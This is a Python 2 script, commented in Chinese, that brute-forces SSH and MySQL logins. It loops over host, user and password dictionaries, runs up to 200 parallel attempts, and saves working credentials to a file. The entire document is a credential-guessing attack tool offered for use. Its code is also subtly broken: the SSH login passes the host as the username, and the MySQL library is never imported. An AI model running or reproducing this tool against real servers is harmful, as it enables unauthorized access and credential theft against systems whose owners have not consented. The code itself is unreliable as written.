




Usage:python xxx –h <目标主机文件> –u <用户字典> –p <密码字典> -P <端口号>


  1. #!coding=utf-8
  2. import re
  3. import socket
  4. import optparse
  5. import threading
  6. from multiprocessing import Pool
  7. import multiprocessing
  9. try:
  10. import paramiko
  11. except ImportError:
  12. print "[!!!]need to install paramiko modul"
  13. print "[!!!]Usage:pip install paramiko"
  14. exit()
  16. result_user =None
  17. result_pass =None
  18. threads =[]
  20. #----------------------------------------------------------------------
  21. def main():
  22. """
  23. 主函数,处理输入的参数
  24. 自动根据所提供的端口号判断mysql与ssh
  25. """
  26. parse = optparse.OptionParser('python %prog --h <host dictionary> --u <users dictionary> --p <password dictionary> -P <port>')
  27. parse.add_option('--h', dest="host_dic", type="string", help='目标主机')
  28. parse.add_option('--u', dest='user_dic', type='string', help='用户字典')
  29. parse.add_option('--p', dest='pwd_dic', type='string', help='密码字典')
  30. parse.add_option('-P', dest='port', type='int', help='端口')
  31. (options, args) = parse.parse_args()
  32. host_dic = options.host_dic
  33. user_dic = options.user_dic
  34. pwd_dic = options.pwd_dic
  35. port = options.port
  36. if host_dic is not None:
  37. mysql_brute(host_dic, user_dic, pwd_dic, port)
  38. else:
  39. print "[!!!]Unknon IP"
  40. exit()
  42. def ip_open(ip,ports):
  43. """
  44. 判断主机是否存活,暂无使用
  45. """
  46. sock =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  47. try:
  48. sock.connect((ip,ports))
  49. sock.settimeout(1)
  50. sock.close()
  51. return True
  52. except Exception:
  53. sock.close()
  54. return False
  56. #----------------------------------------------------------------------
  57. def mysql_brute(host_dic,user_dic,pwd_dic,port):
  58. """
  59. MySQL暴力破解
  60. :param host_dic: 主机
  61. :param user_dic: 用户字典
  62. :param pwd_dic: 密码字典
  63. :param port: 端口
  64. :return: None
  65. """
  67. hostlist = None
  68. userlist = None
  69. pwdlist = None
  70. try:
  71. hostlist = [k.strip('\n') for k in open(host_dic, 'r').readlines()]
  72. userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()]
  73. pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()]
  74. print "[*] Number of hosts:" + str(len(hostlist))
  75. print "[*] Number of users:" + str(len(userlist))
  76. print "[*] Number of passwords:" + str(len(pwdlist))
  77. except Exception:
  78. print "[!] The path of the dictionary file is incorrect"
  79. exit()
  80. global threads
  81. if port==22:
  82. paramiko.util.log_to_file("filename.log")
  83. p = Pool(200)
  84. for host in hostlist:
  85. for user in userlist:
  86. for pwd in pwdlist:
  87. if port ==3306:
  88. p.apply_async(mysql_login,args=(host, user, pwd, port))
  89. elif port ==22:
  90. p.apply_async(ssh_login,args=(host, user, pwd, port))
  91. p.close()
  92. p.join()
  94. #----------------------------------------------------------------------
  95. def ssh_login(host, username, password, port):
  96. """
  97. ssh登录
  98. :param host:主机
  99. :param username:用户名
  100. :param password: 密码
  101. :param port: 端口
  102. :return: None
  103. """
  104. try:
  105. ssh = paramiko.SSHClient()
  106. #以传统密钥验证用户密码
  107. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  108. ssh.connect(hostname=host,username=host,password=password,port=port)
  109. ssh.close()
  110. print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
  111. output = open("good.txt", 'a')
  112. output.write(host+"=>"+username+"----"+password+"\n")
  113. except:
  114. print "[-] host:"+host+" Password:" + password
  115. pass
  117. #----------------------------------------------------------------------
  118. def mysql_login(host, username, password, port):
  119. """
  120. MySQL连接
  121. :param host:主机
  122. :param username:用户名
  123. :param password: 密码
  124. :param port: 端口
  125. :return: None
  126. """
  127. try:
  128. db = MySQLdb.connect(host=host, user=username, passwd=password, port=port,connect_timeout=1)
  129. print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
  130. global result_user, result_pass
  131. result_user = username
  132. result_pass = password
  133. output = open("good.txt", 'a')
  134. output.write(host+"=>"+username+"----"+password+"\n")
  135. db.close()
  136. exit()
  137. except Exception:
  138. print "[-] host:"+host+" Password:" + password
  139. pass
  142. #----------------------------------------------------------------------
  143. if __name__ == '__main__':
  144. main()
  145. print "\033[1;32;41m[*] Scan OK! \033[0m"
  146. exit()



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